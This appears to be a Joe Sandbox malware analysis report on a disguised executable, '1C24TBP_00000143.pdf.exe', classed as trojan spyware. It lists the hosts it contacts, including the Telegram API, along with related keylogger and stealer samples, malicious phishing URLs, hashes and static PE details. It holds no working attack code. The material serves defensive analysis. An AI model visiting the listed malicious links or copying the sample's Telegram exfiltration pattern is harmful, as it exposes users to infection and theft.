http://api.telegram.org	aspnet_compiler.exe, 00000004.00000002.3384173500.000001698783F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3384173500.00000169878BE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	1C24TBP_00000143.pdf.exe, 00000000.00000002.2630438443.000001F400001000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3384173500.00000169877A1000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
172.67.135.55	www.inspiranti.com	United States	13335	CLOUDFLARENETUS	false
104.26.13.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1564719
Start date and time:	2024-11-28 18:38:44 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1C24TBP_00000143.pdf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/0@3/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 52% Number of executed functions: 178 Number of non-executed functions: 8
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 1C24TBP_00000143.pdf.exe, PID 6916 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 1C24TBP_00000143.pdf.exe

Simulations

Behavior and APIs

Time	Type	Description
12:39:35	API Interceptor	54x Sleep call for process: 1C24TBP_00000143.pdf.exe modified
12:40:29	API Interceptor	249293x Sleep call for process: aspnet_compiler.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	t1gY0BGmOZ.jar	Get hash	malicious	Can Stealer	Browse
	SITHIPHORN_Doc2709202400000.exe	Get hash	malicious	AgentTesla	Browse
	https://share.fremontpeak.org/___.YzJ1OmNvZ2l3ZWIyOmM6bzpiNTEyZDAxNmZiN2I1MjU1MmE3OTQzOTdiZmE2NWEzZjo3OmQ0ZjU6ZDQ4OTQ1MWM1NjM2NzgxOWI0N2UyODgzNmYwYzIzOTkxYjZmOTA5ZjUyY2M5MTJiN2UzZTBiMmYwOTQ5NzhhNTpoOlQ6Tg	Get hash	malicious	Unknown	Browse
	https://u48396839.ct.sendgrid.net/ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FNYQWfEnFZNtXik-2Bc8xYTdlDDi-2B43g3xWfoVMN9Dsem2IaNiiX-2B-2BZ0QUoG_EefQjaPBlm3j-2F4SdpslfvAk7fHMHOXJ7LweRGvhfSEmfDfe568-2FY-2BOLHESUZOtre1SJ0b0hpgZyE9nNkk5TdPOPC4tMbl8SiWrItsarfSJPs2UVOaCUP5NH54Bsd5iepHuriwvocK8ytgM3DUdP-2FGahP9TgWP8NK8XkzPu1yHstDO59EN9oezB0Bvcj4q1reEb5SVFPJB790ukEQpDzKhgmB7njVUkFC8cDwRBiYm4JeBTEVj-2FO9L-2B-2B-2FOmACAmxhX3ZwjKn-2F44onZNgScafSE7DBg-2BaKyUPEhIs0htUoWnblk2BMfXpJIrTjI4RRPPL3aYkpTlROjrttDT-2FsPXJXV6Ht5SRUu-2B0FMc-2F6UTXOUHRIAToTaXExoh-2BhOHngBDGdH-2FjIVKS7GHuJm-2FScM7fL8YyMYHIc3ZF3zj-2FrNo1yxz6qQNvNwYKE88E7ss0Of03GH-2FJ0B8fjyNmYGjPzU42L4WTkis-2FCNDcoVJ6gJCIZpmjB42-2FzDW6h-2FUREH0NUo2OPfZ9i8VYJz7QmCHLGmxdxD04Jz41PYtN7DaspcbsjIDanjiifLEQrLEWmHGBUFW4S8xlKCRj6eGsM5ZaDHWshSLBdAzDSyuonhuBxtuYLeNVHermIaoXD85egwdLJYANewTDecNDoTikVJ8mQdl7ZtnugAlt3ha0w0KmdiGihn6nvMrhhJrSgrE-2B65pLabznZrU0JRBQYA244iDFukcakZMIzjlzqr9piWLEWATx3NZaoZsiDxjNPIcS-2BPZq07eqXM1Ulzf-2FqkjGpcDoFG-2FrwE0q08CJl0HkI1XntIga1RDU5EZi756rrs6KbGhi0n0UYyAPMzcKJ1GSCyUZR-2FjEg-2FvBTzHO-2FOloWzctFMjjbt8OJhXkQtpwpSzQ5WMHPnqPpU8mVl6-2F8VDi2j4ulsfLIYkFMQxs-2FFnpoz7jaZyont10-3D	Get hash	malicious	Unknown	Browse
	inseminating.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Teklif Talebi__77252662______PDF_PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	oS6KsQIqJxe038Y.exe	Get hash	malicious	DarkCloud, PureLog Stealer	Browse
	hesaphareketi-01-27112024.exe	Get hash	malicious	Snake Keylogger	Browse
	Teklif_PDF.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
104.26.13.205	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	172.67.74.152
	SITHIPHORN_Doc2709202400000.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Order SMG 201906 20190816order.pdf.scr.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	104.26.12.205
	DHL Delivery Invoice.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	104.26.12.205
	AID0109FLT24DO53CD-F.pdf	Get hash	malicious	Unknown	Browse	104.26.13.205
	https://u48346967.ct.sendgrid.net/ls/click?upn=u001.A0zc-2BEvyk1Wl-2FMpdhEZeKOri2-2FGgH2RTzsX65VEcnN5SaLyl0UT8OMFIJrPp3PpoUM6xY28FQ2N7ftppG5RudDteJXD3BQZCthiPi2c2ALFGlSPfhe-2FcxhcglgWUQb-2BQESuvSP1z-2Bm6yiScj3t94MRtf0LYKB9CrrSBugAIE2LYG8LmYpSkH60B-2FMZ3-2BrvjbSA4-2FMKq-2BcyWHr8EPqNcLYpXKIa0eXlisYAn-2BUQ7zduW7tl-2BbLdZxK7-2F64kDFJWjAhA5-2BQkfVJJJox5IXYuhbutR70TtJJBVXs1-2BGpCmHbl-2BDNTOjQhDGBdV0GcWgnTqzbjbnvsgf-2Be0TXvdX5Smk9Cf3e70Q9X7CCHEUK7n5Iz83JVMEOM-2Fand-2B23jD1RrWlwwdn356TAiWPO93YBbqf0SO77Y7wdjJ1b9FY9HkvpCMIajIk8oGDIkalcOsvDrkfpAsNhyAACh29yO16Fg-2FM5u3K-2FXbE9Ex7FVSxGjaaC9sm3ZFKCHARATSNuZ5Fje0JCvs-2FuHNf8MhNMkgfl0FBuxcFtouETvn8R0InFl5AtNwGS6Afu60jlKV5PLEF8GeumMl4Zuoh2K-2F2yPQclKc1crfKqXCOnUQUzOQ7UyIpV0r3b47s6ht1AVAEPjV3zoZw9RLpCyXdGkoI8n06eY007Qg9WwLvy7We-2BQcl-2FyYQ4K56RiNFy6ideRccN4rvz5rlbEO4SM2GPwiXl06aWh1Z8A-3D-3DayVm_7jfNTkQybv-2BVetjXJenftZxQwKjBczDJqHH7EaznqVv3v2Dkt-2FIgZwJNXIp-2FyMqSeIPtfO34Zh0BJrBXMe8iDwc4F5cynKVd9U-2BCWNvBhYWndn5YPpcrm9EU-2BINyUV9MYoGCAzxOgZamtaAmmSvzUZGau9tG0E7vfYFw2WK2ssr4DmY5GXF-2BgMFUeEjp9HrYndaGnf0PXO4kOxtTViX7PlJWm1KFcSCvZKxLAfO2BkacR3B5XEdLDYpCUp92-2FH-2FHkhtVIRx1yIxGh6p91O9ZVon-2F9iC9RT46lS0PoWolD8OcxI1a8fShT6Hp4QWQfdHwSEy80yGx3wt6ImkGF4v9TXkQs-2Fsq-2FVFPoSnqaJLrItk8v5xWRdhyDRHKG-2BDTjP6JA9QphZ2npWlpDplGG-2B7VPrWDZBnEu36loOA6wRajUleT-2BwoMeGN4STY52Ur27KRveKCJr82irXKChZwqe-2BaUbmDOUwyLdpuYgAFKsd-2BPzSGCG9KIfFEO3qjrRe-2Ft9WxzxVxFb7rM1MFj1q2QSoqqpSZyyIO6o9dQWLpdkFrZCNwiV9o0NuRkda7B0vqLodHzU4jQ4E2ZVSRC2Gc87k08fCi-2BBF7Dmw-2F3-2FQYcQ-2BUHjUCqjlkaHmxOAI7-2FhdUS1Wb7BgsTAm-2Ft-2BvXBxupXitGd4JcEDUe0WuuxdFLUCWiEzHEB6DI0pZnKp0MjuL6t-2FHdSSyJSuzZQLJWoI1iWOBow7nssQ-2FtT6mq0c4kg9bIepJUAi8J12B9eClWiTZDtbREopSTPA0TrHAq8mBDFqCQ0MfGj13zUsahv2EEEPM5XcF8DfOVu-2BwcjmThtw28U2MS5BiDqE1Pwg-2BCEH40qmpHlF5lcXadw9ehGsQbMKc0VYqPjH2-2BLldks6uo-2Fln-2BeeieWNP8wXJfHHwtYJznNHWBqLw-3D-3D	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://digitalplatform-admin-p.azurewebsites.net/external-link/?targetURL=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25SERIAL%2525wDnNeW8yycT&sa=t&esrc=nNeW8F%25SERIAL%2525A0xys8Em2FL&source=&cd=tS6T8%25SERIAL%2525Tiw9XH&cad=XpPkDfJX%25SERIAL%2525VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/www.monument-funerar.ro/admin/view/image/payment/#test@example.de	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Get hash	malicious	AgentTesla, MassLogger RAT, Phoenix Stealer, PureLog Stealer, RedLine, XWorm	Browse	104.26.12.205
	INVITATION TO BID as on 25 NOV 2024.html	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205
	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	104.26.13.205
api.telegram.org	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	t1gY0BGmOZ.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	SITHIPHORN_Doc2709202400000.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	https://share.fremontpeak.org/___.YzJ1OmNvZ2l3ZWIyOmM6bzpiNTEyZDAxNmZiN2I1MjU1MmE3OTQzOTdiZmE2NWEzZjo3OmQ0ZjU6ZDQ4OTQ1MWM1NjM2NzgxOWI0N2UyODgzNmYwYzIzOTkxYjZmOTA5ZjUyY2M5MTJiN2UzZTBiMmYwOTQ5NzhhNTpoOlQ6Tg	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://u48396839.ct.sendgrid.net/ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FNYQWfEnFZNtXik-2Bc8xYTdlDDi-2B43g3xWfoVMN9Dsem2IaNiiX-2B-2BZ0QUoG_EefQjaPBlm3j-2F4SdpslfvAk7fHMHOXJ7LweRGvhfSEmfDfe568-2FY-2BOLHESUZOtre1SJ0b0hpgZyE9nNkk5TdPOPC4tMbl8SiWrItsarfSJPs2UVOaCUP5NH54Bsd5iepHuriwvocK8ytgM3DUdP-2FGahP9TgWP8NK8XkzPu1yHstDO59EN9oezB0Bvcj4q1reEb5SVFPJB790ukEQpDzKhgmB7njVUkFC8cDwRBiYm4JeBTEVj-2FO9L-2B-2B-2FOmACAmxhX3ZwjKn-2F44onZNgScafSE7DBg-2BaKyUPEhIs0htUoWnblk2BMfXpJIrTjI4RRPPL3aYkpTlROjrttDT-2FsPXJXV6Ht5SRUu-2B0FMc-2F6UTXOUHRIAToTaXExoh-2BhOHngBDGdH-2FjIVKS7GHuJm-2FScM7fL8YyMYHIc3ZF3zj-2FrNo1yxz6qQNvNwYKE88E7ss0Of03GH-2FJ0B8fjyNmYGjPzU42L4WTkis-2FCNDcoVJ6gJCIZpmjB42-2FzDW6h-2FUREH0NUo2OPfZ9i8VYJz7QmCHLGmxdxD04Jz41PYtN7DaspcbsjIDanjiifLEQrLEWmHGBUFW4S8xlKCRj6eGsM5ZaDHWshSLBdAzDSyuonhuBxtuYLeNVHermIaoXD85egwdLJYANewTDecNDoTikVJ8mQdl7ZtnugAlt3ha0w0KmdiGihn6nvMrhhJrSgrE-2B65pLabznZrU0JRBQYA244iDFukcakZMIzjlzqr9piWLEWATx3NZaoZsiDxjNPIcS-2BPZq07eqXM1Ulzf-2FqkjGpcDoFG-2FrwE0q08CJl0HkI1XntIga1RDU5EZi756rrs6KbGhi0n0UYyAPMzcKJ1GSCyUZR-2FjEg-2FvBTzHO-2FOloWzctFMjjbt8OJhXkQtpwpSzQ5WMHPnqPpU8mVl6-2F8VDi2j4ulsfLIYkFMQxs-2FFnpoz7jaZyont10-3D	Get hash	malicious	Unknown	Browse	149.154.167.220
	inseminating.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Teklif Talebi__77252662______PDF_PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	oS6KsQIqJxe038Y.exe	Get hash	malicious	DarkCloud, PureLog Stealer	Browse	149.154.167.220
	hesaphareketi-01-27112024.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Teklif_PDF.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
www.inspiranti.com	9DP4y36Dlu.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	9DP4y36Dlu.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	1C24TDH_00017388.pdf.exe	Get hash	malicious	AgentTesla	Browse	188.114.96.3
	Products_List_QH082226.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	Products_List_QH082226.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	QH_Group - Products List 000227.pdf.exe	Get hash	malicious	AgentTesla	Browse	188.114.97.3
	1C24THP_00000244.pdf.exe	Get hash	malicious	AgentTesla	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	t1gY0BGmOZ.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	SITHIPHORN_Doc2709202400000.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	https://share.fremontpeak.org/___.YzJ1OmNvZ2l3ZWIyOmM6bzpiNTEyZDAxNmZiN2I1MjU1MmE3OTQzOTdiZmE2NWEzZjo3OmQ0ZjU6ZDQ4OTQ1MWM1NjM2NzgxOWI0N2UyODgzNmYwYzIzOTkxYjZmOTA5ZjUyY2M5MTJiN2UzZTBiMmYwOTQ5NzhhNTpoOlQ6Tg	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://u48396839.ct.sendgrid.net/ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FNYQWfEnFZNtXik-2Bc8xYTdlDDi-2B43g3xWfoVMN9Dsem2IaNiiX-2B-2BZ0QUoG_EefQjaPBlm3j-2F4SdpslfvAk7fHMHOXJ7LweRGvhfSEmfDfe568-2FY-2BOLHESUZOtre1SJ0b0hpgZyE9nNkk5TdPOPC4tMbl8SiWrItsarfSJPs2UVOaCUP5NH54Bsd5iepHuriwvocK8ytgM3DUdP-2FGahP9TgWP8NK8XkzPu1yHstDO59EN9oezB0Bvcj4q1reEb5SVFPJB790ukEQpDzKhgmB7njVUkFC8cDwRBiYm4JeBTEVj-2FO9L-2B-2B-2FOmACAmxhX3ZwjKn-2F44onZNgScafSE7DBg-2BaKyUPEhIs0htUoWnblk2BMfXpJIrTjI4RRPPL3aYkpTlROjrttDT-2FsPXJXV6Ht5SRUu-2B0FMc-2F6UTXOUHRIAToTaXExoh-2BhOHngBDGdH-2FjIVKS7GHuJm-2FScM7fL8YyMYHIc3ZF3zj-2FrNo1yxz6qQNvNwYKE88E7ss0Of03GH-2FJ0B8fjyNmYGjPzU42L4WTkis-2FCNDcoVJ6gJCIZpmjB42-2FzDW6h-2FUREH0NUo2OPfZ9i8VYJz7QmCHLGmxdxD04Jz41PYtN7DaspcbsjIDanjiifLEQrLEWmHGBUFW4S8xlKCRj6eGsM5ZaDHWshSLBdAzDSyuonhuBxtuYLeNVHermIaoXD85egwdLJYANewTDecNDoTikVJ8mQdl7ZtnugAlt3ha0w0KmdiGihn6nvMrhhJrSgrE-2B65pLabznZrU0JRBQYA244iDFukcakZMIzjlzqr9piWLEWATx3NZaoZsiDxjNPIcS-2BPZq07eqXM1Ulzf-2FqkjGpcDoFG-2FrwE0q08CJl0HkI1XntIga1RDU5EZi756rrs6KbGhi0n0UYyAPMzcKJ1GSCyUZR-2FjEg-2FvBTzHO-2FOloWzctFMjjbt8OJhXkQtpwpSzQ5WMHPnqPpU8mVl6-2F8VDi2j4ulsfLIYkFMQxs-2FFnpoz7jaZyont10-3D	Get hash	malicious	Unknown	Browse	149.154.167.220
	inseminating.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Teklif Talebi__77252662______PDF_PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	oS6KsQIqJxe038Y.exe	Get hash	malicious	DarkCloud, PureLog Stealer	Browse	149.154.167.220
	hesaphareketi-01-27112024.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Teklif_PDF.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	RE ADVANCE REMITTANCE-INV000567.exe	Get hash	malicious	Unknown	Browse	172.67.200.96
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	104.21.13.139
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	172.67.74.152
	tnljashd27.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	sdfgdsfkjg27.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	tnkjasdhf27.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	t1gY0BGmOZ.jar	Get hash	malicious	Can Stealer	Browse	104.21.76.84
	SITHIPHORN_Doc2709202400000.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
CLOUDFLARENETUS	RE ADVANCE REMITTANCE-INV000567.exe	Get hash	malicious	Unknown	Browse	172.67.200.96
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	104.21.13.139
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	172.67.74.152
	tnljashd27.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	sdfgdsfkjg27.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	tnkjasdhf27.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	t1gY0BGmOZ.jar	Get hash	malicious	Can Stealer	Browse	104.21.76.84
	SITHIPHORN_Doc2709202400000.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	RE ADVANCE REMITTANCE-INV000567.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 172.67.135.55 104.26.13.205
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 172.67.135.55 104.26.13.205
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	149.154.167.220 172.67.135.55 104.26.13.205
	tnljashd27.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	149.154.167.220 172.67.135.55 104.26.13.205
	sdfgdsfkjg27.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	149.154.167.220 172.67.135.55 104.26.13.205
	tnkjasdhf27.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	149.154.167.220 172.67.135.55 104.26.13.205
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220 172.67.135.55 104.26.13.205
	#U8b49#U64da_89004161-000002102-66_20241128#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.220 172.67.135.55 104.26.13.205
	SITHIPHORN_Doc2709202400000.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220 172.67.135.55 104.26.13.205
	Document BT24#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.220 172.67.135.55 104.26.13.205

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	1.413529828601366
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	1C24TBP_00000143.pdf.exe
File size:	376'832 bytes
MD5:	cfbfabd8e0b67d01a19458be6b945517
SHA1:	fa3d597f04aa2dd1e7f97c9b8f9c69a5411c6361
SHA256:	eda66fd0e1f4c8f0cdda206c461373ec760cc02eb0972c121cdf0ffc64702f8f
SHA512:	1927b7b6f8cc1bbe2dd786986c806e7b44574f859968bf0fd4046daf8ad4a4e1ce02ca5d511c2b48e3c5b3e838eeb4b0e5bd2ad9a27313eaae6d6011a675bb9a
SSDEEP:	384:ESKu2cP3nyEVPTHWKtL2H0VuM35zlQEew+yTzSf4JM54iICSCr4H444uiiiL1CjW:N3vnyAWkaHRQMwdz+4H4447iiL1o
TLSH:	B8846690AF6494B4E921FDB12799E735D25B6CA236202F426DC0339B75F36D0BF07268
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...r..f.........."...................... ....@...... ....................................`...@......@............... .....

File Icon


Icon Hash:	98306c8c8eb282c4

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66CECD72 [Wed Aug 28 07:10:42 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x5ad72	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xe6c	0x1000	07b31c034b457cafe29f101d14d12bfe	False	0.54931640625	data	5.1573250814158165	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x4000	0x5ad72	0x5ae00	609d2ded9a928af7c2a4c0862ada9367	False	0.03850101014442916	data	1.3325860667630138	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x4220	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 262144, resolution 2835 x 2835 px/m	0.026130277835310828
RT_ICON	0x46248	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m	0.26861702127659576
RT_ICON	0x466b0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m	0.11275933609958506
RT_ICON	0x48c58	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m	0.13930581613508441
